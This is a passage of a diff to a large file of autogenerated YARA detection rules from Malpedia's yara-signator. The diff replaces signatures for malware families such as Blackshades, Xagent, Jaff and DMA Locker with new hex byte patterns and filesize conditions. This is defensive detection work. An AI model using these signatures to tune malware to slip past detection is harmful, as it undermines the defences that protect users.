-		$sequence_9 = { 85c0 0f88ad000000 c7442410e0710010 c744240c40640010 c744240804000000 }
+		$sequence_0 = { 4883ec28 48b8abaaaaaaaaaaaaaa 4889d3 4989cc 4889d6 4829cb }
+		$sequence_1 = { 4889d7 66c703302e f3aa 498d442c02 }
+		$sequence_2 = { 488b8c2488000000 e8???????? 488d8c2458040000 e8???????? 4c89e9 }
+		$sequence_3 = { 42c6442d5aef c6440d5abf c644155abd b800020000 4829d8 }
+		$sequence_4 = { 4889d9 e8???????? 488d842488010000 4889ea 48895c2460 4889c1 }
+		$sequence_5 = { 488b4c2458 e8???????? 4c89e1 e8???????? 4889d9 e8???????? 488b4c2450 }
+		$sequence_6 = { 4889e9 e8???????? 90 4881c4b8010000 5b }
+		$sequence_7 = { 488b8c24b0000000 e8???????? 488b8c2498000000 e8???????? }
+		$sequence_8 = { 4c89f9 e8???????? 488b4c2448 e8???????? 4c89f1 e8???????? 488b4c2438 }
+		$sequence_9 = { 4c8da424c0000000 48c78424c800000002000000 48898424a0000000 4c89e2 48898424c0000000 488d8424e8040000 4889c1 }
 
 	condition:
-		7 of them and filesize < 90112
+		7 of them and filesize < 674816
 }
-rule MALPEDIA_Win_Xpan_Auto : FILE
+rule MALPEDIA_Win_Arik_Keylogger_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6b6d87b0-cd4f-5f1f-ad41-a91b081050bf"
+		id = "7cfe77b9-498e-52b0-a1e5-e481078fb2b8"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xpan"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.xpan_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.arik_keylogger"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.arik_keylogger_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "53afdb60ad3d527db39db546f8bfd19e69fe202e95aaa870b577cf5bc58b7794"
+		logic_hash = "efa31a5efe80de4c661e6c1fa566389f67f3059a66f1ad3d5cfcbb40b493c756"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -129513,34 +129882,34 @@ rule MALPEDIA_Win_Xpan_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c002 894108 b8ffffffff 6689450c 8b4108 3b410c 0f83e6030000 }
-		$sequence_1 = { 740a 8b5c2444 c6450000 89ee 84d2 748c 8b6c2450 }
-		$sequence_2 = { 0f8313040000 0fb700 6683f8ff 0f8403030000 }
-		$sequence_3 = { c744247400000000 c744247cffffffff 89442454 8b8424a0000000 2500600000 89442420 89442458 }
-		$sequence_4 = { 0f848d020000 66894514 31c0 38d8 0f8427feffff 8b4d08 }
-		$sequence_5 = { 0fb65610 89fb 31c9 31ff 885dd0 8d7600 8dbc2700000000 }
-		$sequence_6 = { 8d5702 89c1 0f44fa 00c1 83df03 29ef 0f844dd3ffff }
-		$sequence_7 = { e9???????? 85c0 74e0 31f6 e9???????? 89eb }
-		$sequence_8 = { 83e101 742b b901000000 83c001 0fb610 80fa20 }
-		$sequence_9 = { 757d 85f6 0f84d8000000 f744245400180000 0f84ca000000 c6450000 84d2 }
+		$sequence_0 = { 8b8064040000 85c0 7468 8b45fc 8b8064040000 e8???????? 89c3 }
+		$sequence_1 = { ff4008 8b45fc ff40f0 e8???????? 8d45c0 e8???????? c745c000000000 }
+		$sequence_2 = { 8d85fcfdffff 89da e8???????? 85c0 750c c745fc12000000 e9???????? }
+		$sequence_3 = { 8d9574ffffff b801000000 e8???????? e8???????? 50 85c0 0f8576010000 }
+		$sequence_4 = { ff75f0 a1???????? ffd0 8b45f4 83c060 b100 ba10000000 }
+		$sequence_5 = { c3 55 89e5 83ec04 a1???????? 8945fc 8b45fc }
+		$sequence_6 = { c745f800000000 58 85c0 7405 e8???????? 8b5dc8 8b75cc }
+		$sequence_7 = { 8b85b8feffff 8945f0 e8???????? 89c3 8d55e8 89d8 8b0b }
+		$sequence_8 = { 8b8064040000 8945f4 8b45fc 8b407c 85c0 7434 814df800000200 }
+		$sequence_9 = { eb60 8b45fc 8b40fc 8b4060 ff30 8b45fc 8b40fc }
 
 	condition:
-		7 of them and filesize < 3235840
+		7 of them and filesize < 4947968
 }
-rule MALPEDIA_Win_Blackshades_Auto : FILE
+rule MALPEDIA_Win_Xagent_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "be0044cc-ffdd-5ce8-9261-6f20deb49ec5"
+		id = "3dbdacb7-861e-58ce-911f-f56ad1729d00"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackshades"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.blackshades_auto.yar#L1-L117"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xagent"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.xagent_auto.yar#L1-L239"
 		license_url = "N/A"
-		logic_hash = "5be1fd8de19e4a88da957f4843427153e72a697b528878c27f4d0e3032429536"
+		logic_hash = "9db965af9a413dbcee60d3c1d7c4b3b1216a3333272ef760fe1fa17d4a9ca01b"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -129552,34 +129921,50 @@ rule MALPEDIA_Win_Blackshades_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff9e0460ff34 6c 60 ff0a }
-		$sequence_1 = { 08fe f5 0200 0000 6c 70ff 9e }
-		$sequence_2 = { 70ff f30004eb f4 02eb fb cf }
-		$sequence_3 = { 351cff1e55 2c00 0d6c04ff1b c700fb301cc9 }
-		$sequence_4 = { 58 2f 60 ff6c74ff }
-		$sequence_5 = { 2a23 60 ff1b 0d002a460c fff5 0200 0000 }
-		$sequence_6 = { 6c ff4a71 70ff 00746c78 ff1b }
-		$sequence_7 = { 6c ff4a71 70ff 00746c78 ff1b 4a }
-		$sequence_8 = { ff6c48ff 6c 4c ff40fc }
-		$sequence_9 = { ff1b 0d002a460c fff5 0200 0000 6c }
+		$sequence_0 = { ff15???????? 8bd8 e8???????? 03d8 }
+		$sequence_1 = { c1ea02 6bd20d b801000000 2bc2 }
+		$sequence_2 = { 57 8b7a08 c1e802 83e103 3bf8 7702 2bc7 }
+		$sequence_3 = { 8b0482 8b0488 8b4e10 85c9 7423 8b7e08 }
+		$sequence_4 = { eb02 8b11 8b4808 8bc1 57 8b7a08 }
+		$sequence_5 = { 894e10 7507 c7460c00000000 5f 5e }
+		$sequence_6 = { 03ff 3b7e0c 7707 c7460c00000000 49 894e10 7507 }
+		$sequence_7 = { 7702 2bc7 8b5204 8b0482 8b0488 8b4e10 }
+		$sequence_8 = { 8b7e08 ff460c 03ff 03ff 3b7e0c 7707 }
+		$sequence_9 = { 8bce e8???????? 8b08 85c9 7504 }
+		$sequence_10 = { 740c 488b07 4c8b13 488903 4c8917 488b13 488b0e }
+		$sequence_11 = { e8???????? 498bce 4e8d0437 482bcf }
+		$sequence_12 = { 384b02 0f92c3 488d4c2430 e8???????? }
+		$sequence_13 = { e8???????? 488b4328 4c8bcf 4c8bc6 }
+		$sequence_14 = { e8???????? 48833b00 740a 488b4308 }
+		$sequence_15 = { 4053 4883ec30 488b4118 488bd9 482b4110 }
+		$sequence_16 = { 8bd8 e8???????? 8d0c18 e8???????? }
+		$sequence_17 = { 84c0 740c 488b07 488b0b 488903 }
+		$sequence_18 = { b803b57ea5 f7e6 c1ea06 6bd263 }
+		$sequence_19 = { baf4010000 488bcb ff15???????? 85c0 }
+		$sequence_20 = { c1ea07 69d295000000 2bca 8bd1 }
+		$sequence_21 = { 75f8 482bc7 488bd6 488d0c38 }
+		$sequence_22 = { 75f8 482bc7 498bd7 488d0c38 }
+		$sequence_23 = { 75f8 482bc7 4d8bc6 488bd3 }
+		$sequence_24 = { 75f8 482bc5 4533e4 488bbc2480000000 4533c9 4c89642430 }
+		$sequence_25 = { 75f8 482bc8 448bc1 488bd0 }
 
 	condition:
-		7 of them and filesize < 999424
+		7 of them and filesize < 729088
 }
-rule MALPEDIA_Win_Meow_Auto : FILE
+rule MALPEDIA_Win_Aresloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7bfddd3d-be4f-534c-b012-013271dcd1ec"
+		id = "72768534-8c41-5891-8d86-5b5baf0231f5"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.meow"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.meow_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.aresloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.aresloader_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "3492cd8205784aeb9b05674679a1cd09e5a722fe3928b65cba6a5afbb0a0fecc"
-		score = 75
-		quality = 75
+		logic_hash = "01346a5099a8423ed0407177afbd014d15a423ebfced07e8fa01ead0f1c12c68"
+		score = 60
+		quality = 25
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -129591,32 +129976,32 @@ rule MALPEDIA_Win_Meow_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c645c14c c645c24b c645c36d c645c44b c645c572 c645c64b c645c74b }
-		$sequence_1 = { c68525fdffff41 c68526fdffff41 8a85fdfcffff 389dfcfcffff 7539 33ff 8d777f }
-		$sequence_2 = { c685d9f8ffff71 c685daf8ffff11 c685dbf8ffff6a c685dcf8ffff11 c685ddf8ffff11 c685def8ffff11 8a85d1f8ffff }
-		$sequence_3 = { c68570fcffff05 c68571fcffff0a c68572fcffff05 c68573fcffff27 c68574fcffff05 c68575fcffff05 c68576fcffff05 }
-		$sequence_4 = { 7209 8b4210 03c6 3bf8 720b 41 663bcb }
-		$sequence_5 = { c6858afbffff4d c6858bfbffff2f c6858cfbffff4d c6858dfbffff2b c6858efbffff4d c6858ffbffff43 c68590fbffff4d }
-		$sequence_6 = { 83c001 0f852e010000 8b442410 40 89442410 8b442410 2503000080 }
-		$sequence_7 = { 00942103007e21 0300 6a21 0300 5c 2103 005021 }
-		$sequence_8 = { c685b1fcffff56 c685b2fcffff56 8a85a9fcffff e8???????? 8985e8f5ffff 8d8d9cfcffff c6859cfcffff00 }
-		$sequence_9 = { 0f845489ffff e9???????? e9???????? 55 8bec ff7508 }
+		$sequence_0 = { c744241c00000000 c744241800000000 c744241410000000 c744241000000000 c744240c00000000 c744240800000000 c744240400000000 }
+		$sequence_1 = { 8b742430 8b7c2438 8b6c243c 85db 7435 }
+		$sequence_2 = { 7831 39d8 7205 c6441eff00 }
+		$sequence_3 = { 8b7c2438 8b6c243c 3d???????? 741d 896c243c 897c2438 89742434 }
+		$sequence_4 = { 8b742434 8b7c2438 8b6c243c 3d???????? }
+		$sequence_5 = { 741d 896c243c 897c2438 89742434 }
+		$sequence_6 = { a1???????? 8b5c2430 8b742434 8b7c2438 8b6c243c 3d???????? }
+		$sequence_7 = { 8b742434 8b7c2438 8b6c243c 3d???????? 741d 896c243c }
+		$sequence_8 = { 897c2408 895c2404 893424 e8???????? 85c0 7831 }
+		$sequence_9 = { 741d 896c243c 897c2438 89742434 895c2430 }
 
 	condition:
-		7 of them and filesize < 492544
+		7 of them and filesize < 2657280
 }
-rule MALPEDIA_Win_Nexster_Bot_Auto : FILE
+rule MALPEDIA_Win_Jaff_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f3849f7f-92fa-5a27-8fce-5cf70a6092f1"
+		id = "dbcef186-9c65-5f08-b104-968bef8d25a5"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nexster_bot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.nexster_bot_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jaff"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.jaff_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "68d99297d7676950ef20645c2f54f180e697aada925cf75041287d48b2b4b344"
+		logic_hash = "9a989bf52696173e65a2ed9949d803cbd331438ebfe4f480f702f5669476fb7a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -129630,32 +130015,32 @@ rule MALPEDIA_Win_Nexster_Bot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 52 e8???????? 68ff030000 8d85bd090000 }
-		$sequence_1 = { ff15???????? 668985ae010000 6a10 8d85ac010000 50 57 }
-		$sequence_2 = { 7d10 668b4c4310 66890c45186e4100 40 ebe8 33c0 }
-		$sequence_3 = { 03f9 837d1810 7208 8b5d04 }
-		$sequence_4 = { 33c0 8da42400000000 8a1485d0604100 889405000e0000 40 83f80b }
-		$sequence_5 = { 731a 8bc8 83e01f c1f905 8b0c8d20804100 c1e006 03c1 }
-		$sequence_6 = { 81c404040000 c3 53 56 57 8bf8 }
-		$sequence_7 = { 66898c24bc010000 e9???????? 8b15???????? a1???????? 8b0d???????? 899424b0010000 }
-		$sequence_8 = { 68???????? 52 e8???????? 68???????? 8d85bc110000 50 }
-		$sequence_9 = { 8a08 40 84c9 75f9 8dbdbc150000 2bc6 4f }
+		$sequence_0 = { 13c9 66f3ab 8b7de8 8d043f 50 6a08 }
+		$sequence_1 = { 7402 d8ca d1e8 7411 }
+		$sequence_2 = { 8b5598 52 6a00 ffd3 50 ffd6 }
+		$sequence_3 = { 66833c4200 7508 3bce 7506 }
+		$sequence_4 = { 8a470c 51 6a08 8975bc 8845c0 ffd3 }
+		$sequence_5 = { 8b5590 52 6a00 ffd7 50 ffd6 53 }
+		$sequence_6 = { 90 668b340a 668931 83c102 ff4df8 75f1 50 }
+		$sequence_7 = { 0f82a5feffff 8b4d14 51 6a00 }
+		$sequence_8 = { 8b55f8 8945d4 8b450c 8b08 0fbe0411 }
+		$sequence_9 = { 6a08 c745e000000000 c745e40a000000 c645e801 ffd3 50 }
 
 	condition:
-		7 of them and filesize < 245760
+		7 of them and filesize < 106496
 }
-rule MALPEDIA_Win_Killav_Auto : FILE
+rule MALPEDIA_Win_Matryoshka_Rat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6ea8eddf-089b-50a4-8f27-4f9ec3d8cbec"
+		id = "b422383a-3b69-5e32-94a3-431dbc17291c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.killav"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.killav_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.matryoshka_rat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.matryoshka_rat_auto.yar#L1-L135"
 		license_url = "N/A"
-		logic_hash = "ff0be756557cba2c394e4d12fd6850def3f48f4054b3fe5a54c94ab0f930267a"
+		logic_hash = "e0e5d3a7b6eaf0039b9fbb2e4baba63862f57599449a2c9f7b8481e16636b102"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -129669,32 +130054,36 @@ rule MALPEDIA_Win_Killav_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b049d70ba4300 f644012801 0f8487000000 817d10ffffff7f }
-		$sequence_1 = { c705????????a0a74300 e8???????? 68???????? 50 }
-		$sequence_2 = { 8d45f4 64a300000000 8bc1 8945e8 817804ffffff07 8b08 8b7d08 }
-		$sequence_3 = { ff34f518054300 ff7508 e8???????? 83c40c }
-		$sequence_4 = { 6bc838 894de0 8b049d70ba4300 f644012801 0f8487000000 817d10ffffff7f }
-		$sequence_5 = { 7603 6a26 58 0fb60c855ed34200 0fb634855fd34200 8bf9 898598f8ffff }
-		$sequence_6 = { 8945ec 83c001 0f92c1 f7d9 0bc8 81f9ffffff7f }
-		$sequence_7 = { c745ec07000000 668945d8 e8???????? 8d45d8 c645fc2a 50 8d4dd0 }
-		$sequence_8 = { c745ec07000000 668945d8 e8???????? 8d45d8 c645fc33 50 8d4dd0 }
-		$sequence_9 = { 8b04bd70ba4300 834c0318ff 33c0 eb16 e8???????? }
+		$sequence_0 = { c3 b06f c3 b063 }
+		$sequence_1 = { b037 c3 b073 c3 }
+		$sequence_2 = { 747d 488d0d6c400500 e8???????? 4533c9 488d4c2438 4533c0 418d5101 }
+		$sequence_3 = { 747e 448b82f4000000 4585c0 7472 }
+		$sequence_4 = { 8b4710 835714ff 0b4714 75c9 }
+		$sequence_5 = { 8b4714 85c0 0f8539010000 85db }
+		$sequence_6 = { 747e 83f928 773d 7438 }
+		$sequence_7 = { 8b4718 8945f8 85f6 745b }
+		$sequence_8 = { 747e 8bcd e8???????? 488bf8 }
+		$sequence_9 = { 8b4720 40 895f14 894710 }
+		$sequence_10 = { 747f 488bcd e8???????? 488bf8 }
+		$sequence_11 = { 8b4724 0fb611 0fb67101 8b4f18 }
+		$sequence_12 = { 8b4714 85c0 7568 ff742438 }
+		$sequence_13 = { 747d 83bc249000000000 7473 4c8d15d68ffdff }
 
 	condition:
-		7 of them and filesize < 517120
+		7 of them and filesize < 843776
 }
-rule MALPEDIA_Win_Badhatch_Auto : FILE
+rule MALPEDIA_Win_Dma_Locker_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "129c68ce-5b2e-52de-a1c8-87ec196923a8"
+		id = "5e2af925-42e5-5846-8ffd-3d54f6df360b"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.badhatch"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.badhatch_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dma_locker"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.dma_locker_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "d1799db66ba63d047ab24cbcf38644792982827a0f2e3a856828a5d589d13430"
+		logic_hash = "3ae5bccd6371af15118f93027d88904afa2d354f640add9013354700a19edfc8"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -129708,32 +130097,32 @@ rule MALPEDIA_Win_Badhatch_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85db 7503 8b5f10 03de 8b7710 037508 eb26 }
-		$sequence_1 = { 68???????? ff7718 e9???????? 68???????? 8dbd54dfffff e8???????? 59 }
-		$sequence_2 = { 53 57 68???????? 50 ff15???????? ff761c ff15???????? }
-		$sequence_3 = { 3bca 7619 8b1d???????? 03da 3bcb 730d }
-		$sequence_4 = { 89742434 89742438 8974243c ff15???????? 8bf8 3bfe 0f852f010000 }
-		$sequence_5 = { 6a02 56 ff15???????? 8bc7 5f 5b c9 }
-		$sequence_6 = { ffd6 ff75cc ffd6 895dcc 895dd0 ffb738010000 }
-		$sequence_7 = { 8d8564ffffff 50 ff15???????? 8945dc 83f8ff 7405 895de4 }
-		$sequence_8 = { 81fee0327077 7415 81fedec5c08a 0f851c010000 894c2424 e9???????? }
-		$sequence_9 = { 6a01 8b7d08 8bc7 e8???????? 59 8945e4 85c0 }
+		$sequence_0 = { 83c40c 6804010000 8d8c24b0060000 51 56 ff15???????? 8d8424ac060000 }
+		$sequence_1 = { 6a00 ffd7 50 6a00 56 6a0f 6896000000 }
+		$sequence_2 = { eb88 8bff 55 8bec 83ec10 a1???????? 33d2 }
+		$sequence_3 = { c744243c08020000 ff15???????? 85c0 7440 8b742418 }
+		$sequence_4 = { 75f9 2bc2 56 50 8d85fcefffff 6a01 }
+		$sequence_5 = { 8b4340 83c40c 50 68???????? eb3e 83f806 7543 }
+		$sequence_6 = { 3bc8 7345 8b4e08 8d95ccefffff 3bca 7738 8bda }
+		$sequence_7 = { e8???????? 6a1c e8???????? 83c404 85c0 7452 }
+		$sequence_8 = { 83c404 894604 85c0 7414 8b750c b967000000 }
+		$sequence_9 = { 6a00 6a01 6a00 68???????? 8d5f14 53 893d???????? }
 
 	condition:
-		7 of them and filesize < 156672
+		7 of them and filesize < 532480
 }
-rule MALPEDIA_Win_Phandoor_Auto : FILE
+rule MALPEDIA_Win_Adylkuzz_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0e2d27b4-00ed-575d-8906-80ec3438892e"
+		id = "265860c5-c195-5ef7-81e8-066fa261eab1"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.phandoor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.phandoor_auto.yar#L1-L163"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.adylkuzz"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.adylkuzz_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "672e69f8a19e82fd9345f6016aa6bea0d13d3c04e81e3fb7b10e21c796057271"
+		logic_hash = "a5ced23a2b6a73ae95a9a6a65000eaf7907a66a0c142cf3646367ed2ee46dd3d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -129747,38 +130136,32 @@ rule MALPEDIA_Win_Phandoor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 833d????????00 0f84ea000000 833d????????00 0f84dd000000 833d????????00 0f84d0000000 }
-		$sequence_1 = { 57 750c 8b36 e8???????? 83c404 eb25 }
-		$sequence_2 = { 50 ffd3 8bf8 85ff 0f84c6010000 }
-		$sequence_3 = { b9???????? 8975fc 8975f8 8975f4 8975f0 }
-		$sequence_4 = { e8???????? 83c404 8d55fc 8bf0 52 56 }
-		$sequence_5 = { 833d????????00 0f8404010000 833d????????00 0f84f7000000 }
-		$sequence_6 = { 8bd9 c1ea08 c1eb10 22da }
-		$sequence_7 = { 0fb6843e94010000 50 b9???????? e8???????? 50 53 e8???????? }
-		$sequence_8 = { 85c0 7502 5f c3 8a08 84c9 }
-		$sequence_9 = { 83c624 833e00 75ea 85c0 }
-		$sequence_10 = { 83c002 89b5e0eeffff 33c9 8975fc }
-		$sequence_11 = { 83c604 81fe???????? 7ceb 5f b801000000 }
-		$sequence_12 = { 43 84c0 7409 8803 }
-		$sequence_13 = { 3acb 740e 50 ffd6 8a08 84c9 }
-		$sequence_14 = { 83c604 e8???????? 57 8bf0 }
-		$sequence_15 = { 56 8b7308 85f6 7420 57 }
+		$sequence_0 = { e8???????? 89ea 89f0 81ca29000200 e8???????? 8b542408 89c5 }
+		$sequence_1 = { 0f8579ffffff 8b4508 89442404 8b85d4feffff 890424 e8???????? 85c0 }
+		$sequence_2 = { f5 663bf6 f7c7b40e1e7c 33c3 85d9 f9 6681ff3c41 }
+		$sequence_3 = { c744240800000000 89442404 e8???????? 83c41c 5b 5e 5f }
+		$sequence_4 = { e9???????? 3dfc000000 7610 3bab98000000 7208 89f0 83c880 }
+		$sequence_5 = { c744241001000000 89c7 eb20 8b4500 8d5008 89d8 e8???????? }
+		$sequence_6 = { c7431001000000 89f7 31c0 83c9ff 89f2 f2ae 89d8 }
+		$sequence_7 = { e8???????? 85c0 7473 89d8 8b33 e8???????? 31d2 }
+		$sequence_8 = { f8 6681fd5547 34ad fec8 32d8 8dadfeffffff 3be1 }
+		$sequence_9 = { eb24 8d4aff 31c0 85d1 751b c6437523 0fbdd2 }
 
 	condition:
-		7 of them and filesize < 2124800
+		7 of them and filesize < 6438912
 }
-rule MALPEDIA_Win_Monero_Miner_Auto : FILE
+rule MALPEDIA_Win_Crytox_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9a367978-bd77-51cd-8e56-86e861b9daa1"
+		id = "cfd8bc3e-6e83-548e-8e5a-491fd708c53c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.monero_miner"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.monero_miner_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.crytox"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.crytox_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "4ac9d0cde3be6117a7ffb436bafb97493b6772afb7402a8076aa8c3226e1ef83"
+		logic_hash = "0d608432c61d44fbe73904a491bbca98a3f6f38166b8de3be56cb8c75f376d55"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -129792,32 +130175,32 @@ rule MALPEDIA_Win_Monero_Miner_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b542408 8b442404 85d2 7416 85c0 7412 8b08 }
-		$sequence_1 = { e8???????? 837b0c10 0f840a090000 8b4308 c7430c10000000 b9ffffffff 85c0 }
-		$sequence_2 = { 8b5e54 8b4e50 89442438 89df 21cf 83ffff 0f849efeffff }
-		$sequence_3 = { 8d442440 31c9 e8???????? 8d942480000000 8d842400010000 b901000000 e8???????? }
-		$sequence_4 = { c683f846000000 8983d8460000 8b8340010000 8983e8460000 8b83ec470000 890424 ff15???????? }
-		$sequence_5 = { c644242900 c644242a01 e9???????? 8b842468010000 8b00 890424 ff15???????? }
-		$sequence_6 = { 8b5c2420 8b742424 85db 7442 8b5348 85d2 7418 }
-		$sequence_7 = { 8b4c2440 31fd 31d3 034c2418 89ac2440040000 8b7c2444 137c241c }
-		$sequence_8 = { 0f29bc2400010000 85d2 0f851e080000 8b7d08 8b5930 8b4f34 89de }
-		$sequence_9 = { c1eb18 09d9 8b74240c 31ca 8b4c2414 c1e510 c1e618 }
+		$sequence_0 = { e8???????? 85c0 0f8483000000 c744240402a00000 891c24 e8???????? 895c2430 }
+		$sequence_1 = { c1ff1f 31f8 29f8 8d3402 0fb601 0fb613 29c2 }
+		$sequence_2 = { d90481 8b442460 c744240801000000 d9ee 890424 dfe9 ddd8 }
+		$sequence_3 = { f7d0 31f6 c1e206 01d0 80bd7ffeffff00 7419 8bb5f8feffff }
+		$sequence_4 = { e8???????? 8b4c2440 3c3f 880419 76e4 8b15???????? c644242c01 }
+		$sequence_5 = { c5fd7f9c2440060000 c5fd7fac24a0050000 c5c5fe9c2460050000 c5c5feec c5fd7f9c2480050000 c5c5fe942400050000 c5c5fea42440070000 }
+		$sequence_6 = { e8???????? 0fb68520faffff 8844242c 83e07f 3c02 0f84c9020000 8b8528faffff }
+		$sequence_7 = { e9???????? 0fb68fe06f6900 89d8 29c8 d3e7 d3e2 89854c3d0000 }
+		$sequence_8 = { d905???????? d94508 d9c9 dfe9 ddd8 7207 b80080ffff }
+		$sequence_9 = { e9???????? 8b4508 8b4044 8b55c8 c1e202 01d0 8b00 }
 
 	condition:
-		7 of them and filesize < 1425408
+		7 of them and filesize < 6156288
 }
-rule MALPEDIA_Win_Mespinoza_Auto : FILE
+rule MALPEDIA_Win_Gopuram_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "33c5af28-80c3-5a94-a560-73cae0098842"
+		id = "8d1cf207-19a7-572a-8ca5-3e711cdc3ad9"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mespinoza"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mespinoza_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gopuram"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.gopuram_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "f5999e99c1ade61277d31280c07cf2a046437f8e201d1bf42efd1294376814d0"
+		logic_hash = "9c847639dd3b37832d4dad79157d5016a8deee4fa6901036c6568baf2f1743d6"
 		score = 75
 		quality = 75
 		tags = "FILE"
